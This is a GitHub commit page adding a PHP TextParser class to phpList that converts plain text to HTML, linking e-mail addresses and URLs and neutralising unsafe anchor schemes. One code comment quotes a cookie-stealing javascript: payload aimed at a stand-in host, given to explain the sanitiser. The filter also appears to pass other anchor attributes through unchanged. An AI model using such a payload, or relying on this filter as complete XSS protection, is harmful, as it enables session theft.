Skip to content

Commit 759d8e0

Browse files
committed
TextParser
1 parent 613a196 commit 759d8e0

File tree

1 file changed

+73
-0
lines changed

1 file changed

+73
-0
lines changed
Lines changed: 73 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,73 @@
1+
<?php
2+
3+
declare(strict_types=1);
4+
5+
namespace PhpList\Core\Domain\Messaging\Service;
6+
7+
/**
 * Turns plain text into simple HTML.
 *
 * E-mail addresses and URLs become clickable links, anchors that are already
 * present in the text are kept (with unsafe URL schemes neutralised), and
 * newlines are converted to <br /> tags.
 */
class TextParser
{
    /**
     * Schemes an already-present anchor may use unchanged. The alternation is
     * grouped so that the ^ anchor applies to every scheme, not just the first.
     */
    private const ALLOWED_SCHEME_PATTERN = '/^(?:https?|mailto|ftp):/i';

    /**
     * @param string $text plain text, optionally containing <a href="..."> anchors
     *
     * @return string the text with links made clickable and newlines turned into <br />
     */
    public function __invoke(string $text): string
    {
        // Drop leading whitespace (including newlines) before any markup is added.
        $text = ltrim($text);

        // Make e-mail addresses clickable.
        $text = $this->replace(
            "/([\._a-z0-9-]+@[\.a-z0-9-]+)/i",
            '<a href="mailto:\\1" class="email">\\1</a>',
            $text
        );

        // Move every anchor (including the mailto links created above) out of the
        // text and leave a %%N%% placeholder behind, so the URL rules further down
        // cannot touch markup that is already a link.
        $linkPattern = "/(.*)<a.*href\s*=\s*\"(.*?)\"\s*(.*?)>(.*?)<\s*\/a\s*>(.*)/is";
        $links = [];
        while (preg_match($linkPattern, $text, $matches)) {
            $url = $matches[2];
            if (!preg_match(self::ALLOWED_SCHEME_PATTERN, $url)) {
                // Neutralise things like
                // <a href="javascript:window.open('http://hacker.com?cookie='+document.cookie)">
                // by removing every colon from URLs that do not start with an allowed scheme.
                $url = str_replace(':', '', $url);
            }

            $index = count($links);
            $links[$index] = '<a href="' . $url . '" ' . $matches[3] . '>' . $matches[4] . '</a>';
            $text = $matches[1] . "%%{$index}%%" . $matches[5];
        }

        // www.example.com -> http://www.example.com
        $text = $this->replace("/(www\.[a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i", 'http://\\1', $text);
        // The previous step may have produced a doubled scheme; keep only the first one.
        $text = $this->replace("/(https?:\/\/)http?:\/\//i", '\\1', $text);
        $text = $this->replace("/(ftp:\/\/)http?:\/\//i", '\\1', $text);

        // http://kernel.org -> <a href="http://kernel.org" class="url" target="_blank">kernel.org</a>
        $text = $this->replace(
            "/(https?:\/\/)(?!www)([a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i",
            '<a href="\\1\\2" class="url" target="_blank">\\2</a>',
            $text
        );

        // http://www.google.com -> <a href="http://www.google.com" class="url" target="_blank">www.google.com</a>
        $text = $this->replace(
            "/(https?:\/\/)(www\.)([a-zA-Z0-9\.\/#~:?+=&%@!\\-_]+)/i",
            '<a href="\\1\\2\\3" class="url" target="_blank">\\2\\3</a>',
            $text
        );

        // Take a possible trailing full stop out of the generated link and put it after it.
        $text = $this->replace(
            "/<a href=\"(.*?)\.\" class=\"url\" target=\"_blank\">(.*)\.<\/a>/i",
            '<a href="\\1" class="url" target="_blank">\\2</a>.',
            $text
        );

        // Put the protected anchors back. This is a literal replacement on purpose:
        // used as a preg_replace() replacement string, a "$1" or "\1" inside a URL
        // or label would be treated as a backreference and silently removed.
        foreach ($links as $index => $html) {
            $text = str_replace("%%{$index}%%", $html, $text);
        }

        // Legacy placeholder step, kept for backward compatibility. The search
        // strings are a backslash followed by a bracket (not a bare bracket), so
        // the net effect after the restore below is that "\(" and "\)" lose their
        // backslash, while "$" round-trips unchanged.
        $text = str_replace(
            ['\\(', '\\)', '$'],
            ['<!--LB-->', '<!--RB-->', '<!--DOLL-->'],
            $text
        );

        // Closing a <p> would be needed for XHTML-compatible paragraphs, so line
        // breaks are simply rendered as <br /> instead.
        $text = str_replace("\r", '', $text);
        $text = str_replace("\n", "<br />\n", $text);

        // Reverse the placeholders introduced above.
        return str_replace(
            ['<!--LB-->', '<!--RB-->', '<!--DOLL-->'],
            ['(', ')', '$'],
            $text
        );
    }

    /**
     * preg_replace() wrapper that always yields a string.
     *
     * preg_replace() returns null when PCRE reports an error; in that case the
     * subject is returned unchanged so the remaining steps can still run.
     */
    private function replace(string $pattern, string $replacement, string $subject): string
    {
        return preg_replace($pattern, $replacement, $subject) ?? $subject;
    }
}

0 commit comments

Comments
 (0)